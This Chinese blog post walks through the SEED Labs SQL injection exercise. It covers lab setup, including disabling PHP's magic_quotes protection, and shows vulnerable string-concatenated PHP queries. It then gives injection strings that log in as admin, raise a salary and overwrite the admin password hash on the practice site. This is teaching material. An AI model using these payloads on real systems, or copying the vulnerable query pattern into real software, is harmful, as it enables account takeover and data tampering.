什么是SQL注入攻击?

最新推荐文章于 2024-05-19 17:03:37 发布
最新推荐文章于 2024-05-19 17:03:37 发布
阅读量115 收藏
点赞数
文章标签: 数据库 安全 信息安全 mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/admin_gt/article/details/122107255
版权

长衫大佬可以坐下来,听听我(tree)(new)(bee):

基本SQL语法

select语句用于从表中选取数据

select 列名 from 表名

update语句用于修改表中的数据

update 表名 set 列名 2= 值2 where 列名1 = 值1

通俗的说 什么是SQL注入呢?

就是用户输入的时候 输入SQL语句 更改后台SQL语句的预定的执行命令

SQL 教程

实验环境准备

4b5d37e873c36e13fe848453afcaff97.png

SEED Ubuntu12虚拟机中安装SQL注入实验网站

$ tar -zxvf ./patch.tar.gz
$ cd patch
$ chmod a+x bootstrap.sh
$ ./bootstrap.sh

关闭PHP SQL注入攻击保护机制

/etc/php5/apache2/php.ini文件中

修改magic quotes gpc = OnOff

启动Apache服务(sudo service apache2 start)

在另一台Linux主机上配置DNS(在/etc/hosts文件添加) 

192.168.59.156 www.seedlabsqlinjection.com

ok!现在你可以成功访问了 通过命令行登录并查看数据库信息如下

$ mysql -u root -pseedubuntu
mysql> use Users;
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| credential      |
+-----------------+
mysql> select * from credential;
+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+
| ID | Name  | EID   | Salary | birth | SSN      | PhoneNumber | Address | Email | NickName | Password                                 |
+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+
|  1 | Alice | 10000 |  20000 | 9/20  | 10211002 |             |         |       |          | fdbe918bdae83000aa54747fc95fe0470fff4976 |
|  2 | Boby  | 20000 |  30000 | 4/20  | 10213352 |             |         |       |          | b78ed97677c161c1c82c142906674ad15242b2d4 |
|  3 | Ryan  | 30000 |  50000 | 4/10  | 98993524 |             |         |       |          | a3c50276cb120637cca669eb38fb9928b017e9ef |
|  4 | Samy  | 40000 |  90000 | 1/11  | 32193525 |             |         |       |          | 995b8b8c183f349b3cab0ae7fccd39133508d2af |
|  5 | Ted   | 50000 | 110000 | 11/3  | 32111111 |             |         |       |          | 99343bff28a7bb51cb6f22cb20a618701a2c2f58 |
|  6 | Admin | 99999 | 400000 | 3/5   | 43254314 |             |         |       |          | a5bdf35a1df4ea895905f6f6618e83951a6effc0 |
+----+-------+-------+--------+-------+----------+-------------+---------+-------+----------+------------------------------------------+

网站原始基本信息如下:

User Employee ID Password Salary Birthday SSN Nickname Email Address Phone#
Admin 99999 seedadmin 400000 3/5 43254314
Alice 10000 seedalice 20000 9/20 10211002
Boby 20000 seedboby 50000 4/20 10213352
Ryan 30000 seedryan 90000 4/10 32193525
Samy 40000 seedsamy 40000 1/11 32111111
Ted 50000 seedted 110000 11/3 24343244

1.SQL注入:如何越权直接变身成admin ?

下面是网站登录模块的代码 找找漏洞?

$conn = getDB();
$sql = "SELECT id, name, eid, salary, birth, ssn,
phonenumber, address, email, nickname, Password
FROM credential
WHERE eid= '$input_eid' and password='$input_pwd'";
$result = $conn->query($sql))
// The following is psuedo code
if(name=='admin'){
return All employees information.
} else if(name!=NULL){
return employee information.
} else {
authentication fails.
}

漏洞:"WHERE eid= '$input_eid' and password='$input_pwd'"

攻击串:' or Name='admin';#

成功登录如下

3aa06b5b1458dc1e27d8912f87c5697f.png

2.SQL注入:如何修改salary 摇身一变变大款 ?

网站提供了一个页面 让用户修改自己的昵称 邮件 地址 电话 密码

719d585668423f181a488ab4e121ca3d.png

更新个人信息的代码是这样写的 如何才能修改自己的salary金钱呢?

$conn = getDB();
$sql = "UPDATE credential SET nickname='$nickname',
email='$email',
address='$address',
phonenumber='$phonenumber',
Password='$pwd'
WHERE id= '$input_id' ";
$conn->query($sql))

咱们在命令行查看数据库的时候 是不是看到了Salary信息

漏洞:$sql = "UPDATE credential SET nickname='$nickname',...

攻击串:',salary='9999999' where Name='Alice'#

瞬间让Alice同学成为最富有的人

6a1ea7c72f1965e31b9cf75aa1b0ce06.png

3.SQL注入:如何修改passwordadmin无路可走 ?

root@gt:/home# echo -n "seedadmin" | openssl sha1
(stdin)= a5bdf35a1df4ea895905f6f6618e83951a6effc0
root@gt:/home# echo -n "hackbiji.top" | openssl sha1
(stdin)= a504e9efce2d451b08c285b2dfd2e7f8b241ba03
root@gt:/home#

攻击串:',Password='a504e9efce2d451b08c285b2dfd2e7f8b241ba03' where Name='Admin'#

现在Admin登录不上自己的帐号了 可怜的站长

56b0cf0d2b88844727b041cae2d49780.png


彩蛋:

黑客笔记 网络安全往事三部曲第15次课 到此已经结束 感谢大家的支持

Live结束 将提供一个为期一年的网站 供学员自由hack 希望读者听众坚持理想

网站IP地址:见Live末尾

有效期:2018.9.1 - 2019.8.31

ailx10
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
SQL 注入攻击的本质
09-11
SQL 注入攻击,又是注入攻击,没想到2008年这个老掉牙的东西又出来搅风搅雨
什么是SQL注入攻击?
南_茗的博客
05-18 4110
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
什么是SQL注入攻击SQL注入攻击原理是什么?
oldboyedu1的博客
11-24 772
SQL语法中直接将用户数据以字符串拼接的方式直接填入SQL中,那么极有可能直接被攻击者通过注入其他语句来执行攻击操作,其中通过执行注入SQL语句可以执行:获取敏感数据、修改数据、删除数据库表等等风险操作。SQL注入攻击是网络安全中非常常见的攻击方式之一,该攻击隐蔽性好、危害大、操作方便,也是各大企业及站长最容易遇到的攻击方式。4、限制目录权限:服务器管理员还应在IIS中为每个网站设置好执行权限,web目录应至少遵循可写目录不可执行,可执行目录不可写的原则,在此基础上,对各目录进行必要的权限细化。
SQL 注入攻击介绍
代码星辰的博客
03-12 4512
SQL 注入攻击介绍
什么是SQL注入攻击,解释如何防范SQL注入攻击
fengyege的博客
08-30 4504
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在Web应用程序的查询语句中插入恶意代码,从而获取数据库中的敏感信息或者执行其他恶意操作。使用参数化查询:使用参数化查询可以避免攻击者通过查询语句中的参数注入恶意代码。参数化查询是一种预编译的查询语句,它通过传递参数而不是直接执行查询语句来执行查询。过滤输入数据:在接收用户输入的数据时,应该对数据进行过滤,删除非法字符和特殊字符。可以使用正则表达式或者白名单过滤器来过滤数据。
SQL注入攻击介绍
热门推荐
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
实例讲解SQL注入攻击
02-26
SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们,就会造成一些出人意料的结果。本...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入攻击与防御
07-17
SQL注入是Internet上最危险、最有名的安全漏洞之一,《SQL注入攻击与防御》是目前唯一一本专门致力于讲解SQL威胁的图书。《SQL注入攻击与防御》作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的...
基于joomlad的SQL注入攻击.pptx
01-05
基于joomlad的SQL注入攻击SQL注入攻击是:黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。相当大一部分程序员在编写代码的时候,没有对用户输入...
mysql事务(原理)
最新发布
m0_74347016的博客
05-19 524
mysql事务原理
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 444
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
生产报表工具PI DataLInk 与 行列视之间的区别
2401_83701843的博客
05-17 250
行列视,全名“行列视生产数据应用系统”,行列视品牌所面对的业务范围远远超越了PIDatalink报表工具,他首先是一款本地部署的在线Excel文档管理系统,解决个人报表在线管理问题,其次,她和PIDataLInk一样,也是面向实时数据库报表需求的一套工具,其区别在于行列视品牌兼容国内外大多数实时数据库,也可以同时连接多个数据源,也就是她完全可以替代PI-DataLINk,同时也适用于其他品牌下的实时数据库系统;
MySQL存储过程添加二十万条数据日常练习
mi_mx的博客
05-17 305
【代码】MySQL日常练习。
linux中查找某个文件或文件夹
DN金猿的博客
05-18 245
locate命令将会在整个系统中搜索文件和文件夹,并通过正则表达式匹配以"/folder_name"结尾的路径。这将会在指定的路径(/path/to/search)中递归地列出所有文件和文件夹,并使用grep命令匹配以"/folder_name"结尾的行。该命令将会在指定的路径(/path/to/search)中查找名称为"folder_name"的文件夹。此方法与第2种方法类似,但使用了find命令来递归搜索文件夹,并使用grep命令来匹配以"/folder_name"结尾的行。
MongoDB聚合运算符:$zip
superatom01的博客
05-15 358
摘要:`$zip`用于将输入数组的元素重新组合转换为新的数组,重组转换的的规则是使用输入数组的第一个元素重组为第一个数组,使用第二个元素重组为第二个数组,以此类推。
【Golang】 MySQL 在 Go 语言驱动程序中常用参数
tr6666的博客
05-15 322
在 Go 语言中,我们使用数据库驱动程序来连接和操作数据库。对于 MySQL,我们通常使用 go-sql-driver/mysql 驱动程序。在使用这个驱动程序时,我们需要提供一个数据源名称(DSN),它是一个包含数据库连接信息的字符串。在这个字符串中,我们可以设置很多参数来控制驱动程序的行为。本文将介绍一些常用的参数。在 MySQL 的 Go 语言驱动程序中,我们可以通过设置 DSN 中的参数来控制驱动程序的行为。这些参数可以影响到连接的建立,数据的读写,以及数据的解析等各个方面。
MySQL-InnoDB数据存储结构
我姓谭却弹不死你的博客
05-13 878
MySQL-InnoDB数据存储结构
CentOS8+MySQL8.0.26+Skywalking9.7.0数据清理机制
xiaozhanfeng的博客
05-15 794
#### 代码中定义的额外模型列,这些模型列在聚合或查询时不需要,会加重负载。但激活后,用户可以看到名称,更容易自行查询数据。##### 1级聚合到2级聚合的刷新时间,默认500毫秒。##### TOPN记录报告周期,默认10分钟。##### 执行数据持久化周期,默认25秒。##### 数据清理定时器,默认5分钟。##### 明细记录有效期,默认3天。##### 监测数据有效期,默认7天。##### 会话时间阈值,默认70秒。##### 数据清理开关,默认开启。
什么是sql注入攻击
05-16
SQL注入攻击是指攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而使应用程序执行非预期的SQL查询或命令。攻击者可以利用SQL注入漏洞来窃取、修改或删除数据库中的敏感数据,甚至可以完全控制应用程序和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ailx10

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值